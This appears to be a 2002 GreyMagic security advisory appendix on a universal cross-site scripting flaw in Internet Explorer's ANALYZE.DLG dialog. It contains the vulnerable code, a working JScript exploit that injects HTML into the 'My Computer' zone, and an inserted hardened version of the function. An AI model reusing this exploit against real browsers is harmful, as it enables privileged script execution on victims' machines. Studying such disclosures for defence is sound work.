
GreyMagic Security Advisory Appendix GM#001-AX

By GreyMagic Software, Israel.
16 Apr 2002.

Topic: Appendix to "IE allows universal Cross Site Scripting".

Introduction:

Thor Larholm has discovered a vulnerability in the implementation of dialogs in Internet Explorer.

However, his demonstration is confined to IE6 because the resource he found to be exploitable first appeared in IE6 (privacy policy).

Discussion:

We have found an exploitable resource that was shipped as early as IE5.

"shdoclc.dll" also contains an "ANALYZE.DLG" resource, which is not as easy to exploit as the policy error files in IE6, but a bit of manipulation gets us the same results.

"ANALYZE.DLG" seemed to be programmed with surprising care, using insertAdjacentText where "unsafe" content may appear instead of innerHTML or insertAdjacentHTML.

However, there is one place where the programmer did not take enough care. Line 187 contains (comments added to explain the code):

// Expected to return an array of <link> elements.
// theDocument variable used in this line is the document property of the
// argument sent to the dialog, an expected window object.
links = theDocument.all.tags("link");

// Sends the array for inspection by another function
retVal = checkLinkReadyStateComplete(links, reportLocation);

And inside the function checkLinkReadyStateComplete:

if (objects == null)
    return retVal;
for (i=0; i < objects.length; i++) {
    element = objects(i);
    if (element.rel.toLowerCase() == "stylesheet"
        || element.rel.toLowerCase() == "alternate stylesheet")
    {
        if (element.readyState != "complete" && element.readyState != 4) {
            reportLocation.insertAdjacentHTML("BeforeEnd", L_StyleSheetNotInstalled_Text + element.href + "<BR><hr>");
            retVal = true;
        }
    }
}

The problem is, of course, on line 205: element.href, a value controlled by the caller of the dialog, is concatenated unescaped into the markup string passed to insertAdjacentHTML.
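As an added example (not code from the advisory or from ANALYZE.DLG), here is a hardened version of checkLinkReadyStateComplete that writes the untrusted href as text rather than markup, the same way the rest of the dialog already handles unsafe content. The report element, the label string and the sample link are constructed stand-ins so it runs outside a browser.

```javascript
// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c];
  });
}

// Constructed stand-in for the dialog's report element. A real DOM node would
// serialize inserted text with the same escaping, so recording it this way lets
// the result be inspected without a browser.
function makeReportLocation() {
  return {
    html: "",
    insertAdjacentHTML: function (where, markup) { this.html += markup; },
    insertAdjacentText: function (where, text) { this.html += escapeHtml(text); }
  };
}

var L_StyleSheetNotInstalled_Text = "Stylesheet not installed: "; // label assumed

// Same checks as the original function, with two changes:
//  - elements are read with [] and validated, so a function object posing as a
//    collection yields nothing to report on;
//  - the untrusted href goes through insertAdjacentText, so it is inserted as a
//    text node and can never be parsed as markup.
function checkLinkReadyStateCompleteSafe(objects, reportLocation) {
  var retVal = false;
  if (objects == null || typeof objects.length !== "number") return retVal;
  for (var i = 0; i < objects.length; i++) {
    var element = objects[i];
    if (!element || typeof element.rel !== "string") continue;
    var rel = element.rel.toLowerCase();
    if (rel === "stylesheet" || rel === "alternate stylesheet") {
      if (element.readyState !== "complete" && element.readyState !== 4) {
        reportLocation.insertAdjacentHTML("BeforeEnd", L_StyleSheetNotInstalled_Text);
        reportLocation.insertAdjacentText("BeforeEnd", element.href);
        reportLocation.insertAdjacentHTML("BeforeEnd", "<BR><hr>");
        retVal = true;
      }
    }
  }
  return retVal;
}

// Run the check against a constructed <link> whose href carries markup.
function demo() {
  var report = makeReportLocation();
  var links = [{ rel: "stylesheet", readyState: "loading", href: "<b>We're in!</b>" }];
  var flagged = checkLinkReadyStateCompleteSafe(links, report);
  return { flagged: flagged, html: report.html };
}
```

The stylesheet is still reported as not installed, but the href arrives in the report as inert text.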

Update (16-May-2002):

Microsoft released a patch for this vulnerability. However, the patch is incomplete: it only covers IE6 and leaves IE5 and IE5.5 vulnerable.

Exploit:

<script language="jscript">
// HTML to be injected (will run in the "My Computer" zone)
var sHTML="<b>We're in!</b>";

// Object to return from tags("link"), must be a function because they use
// objects(i) instead of objects[i], VB style collection access.
function oExploit(iSec) {
    return {
        // Satisfy line 201
        rel:"stylesheet",

        // Satisfy line 204
        readyState:"exploit",

        // Exploit line 205
        href:sHTML
    };
}

// A length property so it will enter the loop
oExploit.length=1;

// A fake window object, so no errors will be raised during the process,
// the custom "tags" method will return an empty array for any element
// other than our target (<link>), in which case it will return the oExploit
// object above.
var oSecurity={
    document:{
        all:{
            tags:function (sTag) {
                return sTag=="link" ? oExploit : [];
            }
        }
    }
}

// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
// and oSecurity (fake window) is sent as the dialog argument.
showModelessDialog("getFile.asp",oSecurity);
</script>

Tested on:

IE5 NT4.
IE5.5 NT4.
IE6 Win2000.

Demonstration:

Notes:

IE5 acts very strangely with this exploit: it works only SOMETIMES, and a few reloads are usually needed to get it to run properly. It seems to have a moral issue with redirecting to res:// files.

IE5.5 and IE6 both run it smoothly.

Disclaimer:

The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Vulnerability details are provided strictly for educational and defensive purposes.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.


Copyright © 2008 GreyMagic Software